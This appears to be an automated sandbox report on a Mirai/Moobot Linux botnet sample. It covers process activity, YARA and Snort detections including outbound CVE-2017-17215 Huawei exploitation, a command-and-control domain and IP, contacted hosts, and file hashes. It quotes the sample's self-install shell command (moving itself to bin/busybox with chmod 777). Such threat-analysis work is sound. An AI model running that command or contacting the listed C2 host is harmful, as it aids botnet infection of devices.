            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/1699/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/113/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/234/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/1335/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/1698/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/114/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/235/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/1334/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/1576/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/2302/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/115/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/236/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/116/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/237/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/117/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/118/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/910/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/119/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/912/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/10/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/2307/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/5815/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/11/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/918/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/12/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/13/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/6243/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/14/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/15/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/6245/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/16/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/17/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/18/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/1594/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/120/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/121/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/1349/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/1/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/122/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/243/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/123/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/2/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/124/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/3/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/4/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/125/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/126/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/1344/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/1465/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/1586/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/127/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/6/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/248/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/128/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/249/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/1463/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/800/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/9/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/801/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/20/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/21/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/1900/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/22/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/23/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/24/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/25/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/26/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/27/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/28/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/29/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/491/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/250/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/130/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/251/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/252/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/132/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/253/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/254/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/255/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/256/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/1599/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/257/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/1477/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/379/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/258/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/1476/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/259/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/1475/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/936/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/30/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/2208/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/35/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/1809/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/1494/cmdline
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241)File opened: /proc/260/cmdline
            Source: /usr/bin/chmod (PID: 6238)File: /tmp/bin/busybox (bits: - usr: rwx grp: rwx all: rwx)Jump to behavior
            Source: /tmp/mbl5k2b7z8.elf (PID: 6233)Shell command executed: sh -c "rm -rf bin/busybox && mkdir bin; >bin/busybox && mv /tmp/mbl5k2b7z8.elf bin/busybox; chmod 777 bin/busybox"
            Source: /bin/sh (PID: 6235)Rm executable: /usr/bin/rm -> rm -rf bin/busybox

            Hooking and other Techniques for Hiding and Protection

            barindex
            Uses known network protocols on non-standard ports
            Source: unknownNetwork traffic detected: HTTP traffic on port 60670 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 60670 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 60670 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 33478 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 33478
            Source: unknownNetwork traffic detected: HTTP traffic on port 54264 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 44838 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 52512 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 46706 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 52512
            Source: unknownNetwork traffic detected: HTTP traffic on port 56602 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 56602
            Source: unknownNetwork traffic detected: HTTP traffic on port 44448 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 58890 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 44552 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 55072 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 55072 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 55072 -> 37215
            Source: /tmp/mbl5k2b7z8.elf (PID: 6231)Queries kernel information via 'uname':
            Source: mbl5k2b7z8.elf, 6231.1.0000560f2b174000.0000560f2b1fb000.rw-.sdmpBinary or memory string: V!/etc/qemu-binfmt/mips
            Source: mbl5k2b7z8.elf, 6231.1.0000560f2b174000.0000560f2b1fb000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/mips
            Source: mbl5k2b7z8.elf, 6231.1.00007ffc335aa000.00007ffc335cb000.rw-.sdmpBinary or memory string: Rx86_64/usr/bin/qemu-mips/tmp/mbl5k2b7z8.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/mbl5k2b7z8.elf
            Source: mbl5k2b7z8.elf, 6231.1.00007ffc335aa000.00007ffc335cb000.rw-.sdmpBinary or memory string: /usr/bin/qemu-mips

            Stealing of Sensitive Information

            barindex
            Yara detected Mirai
            Source: Yara matchFile source: mbl5k2b7z8.elf, type: SAMPLE
            Source: Yara matchFile source: 6231.1.00007f8304400000.00007f8304414000.r-x.sdmp, type: MEMORY
            Yara detected Moobot
            Source: Yara matchFile source: mbl5k2b7z8.elf, type: SAMPLE
            Source: Yara matchFile source: 6231.1.00007f8304400000.00007f8304414000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: mbl5k2b7z8.elf PID: 6231, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected Mirai
            Source: Yara matchFile source: mbl5k2b7z8.elf, type: SAMPLE
            Source: Yara matchFile source: 6231.1.00007f8304400000.00007f8304414000.r-x.sdmp, type: MEMORY
            Yara detected Moobot
            Source: Yara matchFile source: mbl5k2b7z8.elf, type: SAMPLE
            Source: Yara matchFile source: 6231.1.00007f8304400000.00007f8304414000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: mbl5k2b7z8.elf PID: 6231, type: MEMORYSTR

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid Accounts1
            Scripting            		Path InterceptionPath Interception2
            File and Directory Permissions Modification            		1
            OS Credential Dumping            		11
            Security Software Discovery            		Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
            Encrypted Channel            		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
            Scripting            		LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth11
            Non-Standard Port            		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
            File Deletion            		Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
            Non-Application Layer Protocol            		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled Transfer3
            Application Layer Protocol            		SIM Card SwapCarrier Billing Fraud

            Malware Configuration

            No configs have been found

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Number of created Files
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 830716 Sample: mbl5k2b7z8.elf Startdate: 20/03/2023 Architecture: LINUX Score: 96 27 test.zxyes.xyz 2->27 29 41.210.203.25 movicel-asAO Angola 2->29 31 99 other IPs or domains 2->31 33 Snort IDS alert for network traffic 2->33 35 Malicious sample detected (through community Yara rule) 2->35 37 Multi AV Scanner detection for submitted file 2->37 39 5 other signatures 2->39 8 mbl5k2b7z8.elf 2->8         started        signatures3 process4 process5 10 mbl5k2b7z8.elf sh 8->10         started        12 mbl5k2b7z8.elf 8->12         started        process6 14 sh chmod 10->14         started        17 sh rm 10->17         started        19 sh mkdir 10->19         started        21 sh mv 10->21         started        23 mbl5k2b7z8.elf 12->23         started        25 mbl5k2b7z8.elf 12->25         started        signatures7 41 Sets full permissions to files and/or directories 14->41

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            mbl5k2b7z8.elf64%ReversingLabsLinux.Trojan.Mirai
            mbl5k2b7z8.elf59%VirustotalBrowse

            Dropped Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            No Antivirus matches

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            test.zxyes.xyz
            		195.133.40.202
            		truetrue
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://schemas.xmlsoap.org/soap/encoding/mbl5k2b7z8.elffalse
                		high
                http://schemas.xmlsoap.org/soap/envelope/mbl5k2b7z8.elffalse
                  		high

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  157.155.206.222
                  		unknownAustralia
                  		17983COLESMYER-AS-APColesMyerAUfalse
                  197.91.42.245
                  		unknownSouth Africa
                  		10474OPTINETZAfalse
                  27.236.72.206
                  		unknownKorea Republic of
                  		4766KIXS-AS-KRKoreaTelecomKRfalse
                  41.134.200.128
                  		unknownSouth Africa
                  		10474OPTINETZAfalse
                  197.179.205.76
                  		unknownKenya
                  		33771SAFARICOM-LIMITEDKEfalse
                  197.165.32.49
                  		unknownEgypt
                  		24863LINKdotNET-ASEGfalse
                  12.198.103.37
                  		unknownUnited States
                  		7018ATT-INTERNET4USfalse
                  150.247.95.86
                  		unknownUnited States
                  		2527SO-NETSo-netEntertainmentCorporationJPfalse
                  41.51.182.15
                  		unknownSouth Africa
                  		37168CELL-CZAfalse
                  157.33.200.173
                  		unknownIndia
                  		55836RELIANCEJIO-INRelianceJioInfocommLimitedINfalse
                  41.72.45.47
                  		unknownAngola
                  		37155NETONEAOfalse
                  157.59.194.195
                  		unknownUnited States
                  		3598MICROSOFT-CORP-ASUSfalse
                  197.27.94.108
                  		unknownTunisia
                  		37492ORANGE-TNfalse
                  197.40.144.189
                  		unknownEgypt
                  		8452TE-ASTE-ASEGfalse
                  197.120.132.150
                  		unknownEgypt
                  		36992ETISALAT-MISREGfalse
                  197.58.18.255
                  		unknownEgypt
                  		8452TE-ASTE-ASEGfalse
                  212.97.40.105
                  		unknownItaly
                  		5602AS-IRIDEOS-KPITfalse
                  161.135.249.204
                  		unknownUnited States
                  		7726FITC-ASUSfalse
                  60.52.117.189
                  		unknownMalaysia
                  		4788TMNET-AS-APTMNetInternetServiceProviderMYfalse
                  134.105.51.121
                  		unknownGermany
                  		42873MPG-FR-SFreiburgStrafrechtDEfalse
                  41.210.203.25
                  		unknownAngola
                  		37081movicel-asAOfalse
                  157.117.145.231
                  		unknownJapan9605DOCOMONTTDOCOMOINCJPfalse
                  41.195.197.57
                  		unknownSouth Africa
                  		16637MTNNS-ASZAfalse
                  41.24.86.1
                  		unknownSouth Africa
                  		36994Vodacom-VBZAfalse
                  197.57.40.27
                  		unknownEgypt
                  		8452TE-ASTE-ASEGfalse
                  157.252.195.39
                  		unknownUnited States
                  		3592TRINCOLL-ASUSfalse
                  75.180.90.80
                  		unknownUnited States
                  		10796TWC-10796-MIDWESTUSfalse
                  41.190.129.200
                  		unknownMauritius
                  		36997INFOCOM-UGfalse
                  157.168.229.19
                  		unknownSwitzerland
                  		22192SSHENETUSfalse
                  197.90.198.169
                  		unknownSouth Africa
                  		10474OPTINETZAfalse
                  197.211.114.208
                  		unknownMalawi
                  		37187SKYBANDMWfalse
                  169.228.238.170
                  		unknownUnited States
                  		7377UCSDUSfalse
                  157.236.83.1
                  		unknownUnited Kingdom
                  		4704SANNETRakutenMobileIncJPfalse
                  115.38.238.72
                  		unknownJapan18126CTCXChubuTelecommunicationsCompanyIncJPfalse
                  197.231.174.170
                  		unknownSouth Africa
                  		37055EMIDZAfalse
                  41.85.32.176
                  		unknownSouth Africa
                  		22355FROGFOOTZAfalse
                  63.169.198.175
                  		unknownUnited States
                  		1239SPRINTLINKUSfalse
                  41.154.82.108
                  		unknownSouth Africa
                  		37079SMMTZAfalse
                  157.145.56.98
                  		unknownUnited States
                  		719ELISA-ASHelsinkiFinlandEUfalse
                  217.56.211.180
                  		unknownItaly
                  		3269ASN-IBSNAZITfalse
                  157.212.14.231
                  		unknownUnited States
                  		4704SANNETRakutenMobileIncJPfalse
                  41.55.86.167
                  		unknownSouth Africa
                  		37168CELL-CZAfalse
                  197.20.220.125
                  		unknownTunisia
                  		37693TUNISIANATNfalse
                  41.203.88.30
                  		unknownNigeria
                  		37148globacom-asNGfalse
                  41.53.150.198
                  		unknownSouth Africa
                  		37168CELL-CZAfalse
                  197.173.143.35
                  		unknownSouth Africa
                  		37168CELL-CZAfalse
                  197.247.28.16
                  		unknownMorocco
                  		36925ASMediMAfalse
                  157.109.178.100
                  		unknownJapan37919SEGASEGAHoldingsCoLtdJPfalse
                  138.251.7.144
                  		unknownUnited Kingdom
                  		786JANETJiscServicesLimitedGBfalse
                  157.129.41.254
                  		unknownFinland
                  		41701CAP-FIN-ASFIfalse
                  197.173.131.66
                  		unknownSouth Africa
                  		37168CELL-CZAfalse
                  157.133.97.49
                  		unknownUnited States
                  		133767SAP_DC_SYDSAPAUfalse
                  197.239.56.166
                  		unknownUganda
                  		37075ZAINUGASUGfalse
                  53.35.84.18
                  		unknownGermany
                  		31399DAIMLER-ASITIGNGlobalNetworkDEfalse
                  197.38.15.101
                  		unknownEgypt
                  		8452TE-ASTE-ASEGfalse
                  96.99.206.144
                  		unknownUnited States
                  		7922COMCAST-7922USfalse
                  187.128.208.242
                  		unknownMexico
                  		28283AdylnetTelecomBRfalse
                  70.7.125.183
                  		unknownUnited States
                  		10507SPCSUSfalse
                  197.51.4.216
                  		unknownEgypt
                  		8452TE-ASTE-ASEGfalse
                  197.255.96.213
                  		unknownGhana
                  		37074UG-ASGHfalse
                  157.37.189.48
                  		unknownIndia
                  		55836RELIANCEJIO-INRelianceJioInfocommLimitedINfalse
                  197.60.132.87
                  		unknownEgypt
                  		8452TE-ASTE-ASEGfalse
                  197.180.144.76
                  		unknownKenya
                  		33771SAFARICOM-LIMITEDKEfalse
                  41.72.21.40
                  		unknownAngola
                  		37155NETONEAOfalse
                  194.72.164.158
                  		unknownUnited Kingdom
                  		2856BT-UK-ASBTnetUKRegionalnetworkGBfalse
                  169.37.67.179
                  		unknownSwitzerland
                  		37611AfrihostZAfalse
                  41.133.169.251
                  		unknownSouth Africa
                  		10474OPTINETZAfalse
                  41.243.103.151
                  		unknownCongo The Democratic Republic of The
                  		37684ANGANI-ASKEfalse
                  41.88.141.232
                  		unknownEgypt
                  		33771SAFARICOM-LIMITEDKEfalse
                  157.21.202.207
                  		unknownUnited States
                  		53446EVMSUSfalse
                  157.135.154.175
                  		unknownUnited States
                  		600OARNET-ASUSfalse
                  41.196.1.100
                  		unknownEgypt
                  		24863LINKdotNET-ASEGfalse
                  43.26.93.139
                  		unknownJapan4249LILLY-ASUSfalse
                  17.220.123.235
                  		unknownUnited States
                  		714APPLE-ENGINEERINGUSfalse
                  121.18.220.148
                  		unknownChina
                  		4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                  157.215.239.15
                  		unknownUnited States
                  		4704SANNETRakutenMobileIncJPfalse
                  197.189.59.11
                  		unknownCongo The Democratic Republic of The
                  		37598EbaleCDfalse
                  197.143.173.239
                  		unknownAlgeria
                  		36891ICOSNET-ASDZfalse
                  90.243.221.86
                  		unknownUnited Kingdom
                  		5378VodafoneGBfalse
                  157.101.64.14
                  		unknownJapan2519VECTANTARTERIANetworksCorporationJPfalse
                  197.223.247.155
                  		unknownEgypt
                  		37069MOBINILEGfalse
                  197.131.139.241
                  		unknownMorocco
                  		6713IAM-ASMAfalse
                  197.249.217.5
                  		unknownMozambique
                  		25139TVCABO-ASEUfalse
                  47.39.49.244
                  		unknownUnited States
                  		20115CHARTER-20115USfalse
                  41.187.12.178
                  		unknownEgypt
                  		20928NOOR-ASEGfalse
                  41.168.23.240
                  		unknownSouth Africa
                  		36937Neotel-ASZAfalse
                  41.235.194.79
                  		unknownEgypt
                  		8452TE-ASTE-ASEGfalse
                  197.121.74.199
                  		unknownEgypt
                  		36992ETISALAT-MISREGfalse
                  157.253.237.105
                  		unknownColombia
                  		3603UniversitydeLosAndesCOfalse
                  41.39.34.249
                  		unknownEgypt
                  		8452TE-ASTE-ASEGfalse
                  197.41.93.128
                  		unknownEgypt
                  		8452TE-ASTE-ASEGfalse
                  41.246.44.154
                  		unknownSouth Africa
                  		5713SAIX-NETZAfalse
                  197.21.42.101
                  		unknownTunisia
                  		37693TUNISIANATNfalse
                  34.167.178.222
                  		unknownUnited States
                  		2686ATGS-MMD-ASUSfalse
                  157.98.55.36
                  		unknownUnited States
                  		3527NIH-NETUSfalse
                  32.150.51.8
                  		unknownUnited States
                  		2686ATGS-MMD-ASUSfalse
                  157.28.31.173
                  		unknownItaly
                  		8968BT-ITALIAITfalse
                  41.61.164.249
                  		unknownSouth Africa
                  		36943GridhostZAfalse
                  107.46.141.66
                  		unknownUnited States
                  		16567NETRIX-16567USfalse
                  41.33.29.216
                  		unknownEgypt
                  		8452TE-ASTE-ASEGfalse

                  Joe Sandbox View / Context

                  IPs

                  No context

                  Domains

                  No context

                  ASNs

                  No context

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  No created / dropped files found

                  Static File Info

                  General

                  File type:ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
                  Entropy (8bit):5.442878534201549
                  TrID:
                  • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                  File name:mbl5k2b7z8.elf
                  File size:84780
                  MD5:d7f3432247daa3564a2f9f282fd892ca
                  SHA1:58ddd0d4593d6362f371acb8877671edb8463d99
                  SHA256:686fb10624e0f6001922f5a7da9d6c10671b960e04da8cb6300bd81671d4407d
                  SHA512:3a08fec1a6e3e892ff9f4e08cc2d1ed1fbc0c321c84440e82a34cb348e2e20456e1e508bf52c146d485765f46354daa041389a9ea722ec12d0ad5534a19c38e0
                  SSDEEP:768:2ty6IP7M/kq0INRhfuN2Eo9tl/de2YIwHKRH0I84EH6UTU77ZDYovZ73x/nL8y89:Rakdn2Eo3ePu5GTgRYo99Be037Wj/
                  TLSH:2B83A51E7E228FADF76D823147B74E25A69833C627E1D641E16CD6012E6034E641FFE8
                  File Content Preview:.ELF.....................@.`...4..H......4. ...(.............@...@....6`..6`..............@..E@..E@.......+.........dt.Q............................<...'..\...!'.......................<...'..8...!... ....'9... ......................<...'......!........'9.

                  Static ELF Info

                  ELF header

                  Class:
                  Data:
                  Version:
                  Machine:
                  Version Number:
                  Type:
                  OS/ABI:
                  ABI Version:
                  Entry Point Address:
                  Flags:
                  ELF Header Size:
                  Program Header Offset:
                  Program Header Size:
                  Number of Program Headers:
                  Section Header Offset:
                  Section Header Size:
                  Number of Section Headers:
                  Header String Table Index:

                  Sections

                  NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                  NULL0x00x00x00x00x0000
                  .initPROGBITS0x4000940x940x8c0x00x6AX004
                  .textPROGBITS0x4001200x1200x115d00x00x6AX0016
                  .finiPROGBITS0x4116f00x116f00x5c0x00x6AX004
                  .rodataPROGBITS0x4117500x117500x1f100x00x2A0016
                  .ctorsPROGBITS0x4540000x140000x80x00x3WA004
                  .dtorsPROGBITS0x4540080x140080x80x00x3WA004
                  .data.rel.roPROGBITS0x4540140x140140x440x00x3WA004
                  .dataPROGBITS0x4540600x140600x3a00x00x3WA0016
                  .gotPROGBITS0x4544000x144000x4980x40x10000003WAp0016
                  .sbssNOBITS0x4548980x148980x1c0x00x10000003WAp004
                  .bssNOBITS0x4548c00x148980x22500x00x3WA0016
                  .mdebug.abi32PROGBITS0x9c60x148980x00x00x0001
                  .shstrtabSTRTAB0x00x148980x640x00x0001

                  Program Segments

                  TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                  LOAD0x00x4000000x4000000x136600x136605.58070x5R E0x10000.init .text .fini .rodata
                  LOAD0x140000x4540000x4540000x8980x2b103.88820x6RW 0x10000.ctors .dtors .data.rel.ro .data .got .sbss .bss
                  GNU_STACK0x00x00x00x00x00.00000x7RWE0x4

                  Network Behavior

                  Snort IDS Alerts

                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                  192.168.2.23195.133.40.20236176569992030490 03/20/23-16:24:46.219802TCP2030490ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)3617656999192.168.2.23195.133.40.202
                  192.168.2.23163.18.94.24060670372152835222 03/20/23-16:25:01.651288TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6067037215192.168.2.23163.18.94.240
                  195.133.40.202192.168.2.2356999361762030489 03/20/23-16:25:13.708877TCP2030489ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response5699936176195.133.40.202192.168.2.23
                  192.168.2.2334.128.181.6354264372152835222 03/20/23-16:25:15.146221TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5426437215192.168.2.2334.128.181.63
                  192.168.2.2341.37.71.1833478372152835222 03/20/23-16:25:08.055278TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3347837215192.168.2.2341.37.71.18

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Mar 20, 2023 16:24:46.188591003 CET3617656999192.168.2.23195.133.40.202
                  Mar 20, 2023 16:24:46.207195044 CET4865737215192.168.2.2354.134.165.245
                  Mar 20, 2023 16:24:46.207505941 CET4865737215192.168.2.2341.254.115.250
                  Mar 20, 2023 16:24:46.207508087 CET4865737215192.168.2.2341.170.162.96
                  Mar 20, 2023 16:24:46.207546949 CET4865737215192.168.2.2341.166.16.10
                  Mar 20, 2023 16:24:46.207566023 CET4865737215192.168.2.23197.107.9.134
                  Mar 20, 2023 16:24:46.207617044 CET4865737215192.168.2.23157.32.148.201
                  Mar 20, 2023 16:24:46.207644939 CET4865737215192.168.2.2341.178.9.75
                  Mar 20, 2023 16:24:46.207665920 CET4865737215192.168.2.2341.34.158.157
                  Mar 20, 2023 16:24:46.207665920 CET4865737215192.168.2.23197.106.57.232
                  Mar 20, 2023 16:24:46.207720041 CET4865737215192.168.2.23157.232.100.171
                  Mar 20, 2023 16:24:46.207746983 CET4865737215192.168.2.23197.203.30.151
                  Mar 20, 2023 16:24:46.207768917 CET4865737215192.168.2.23157.156.3.203
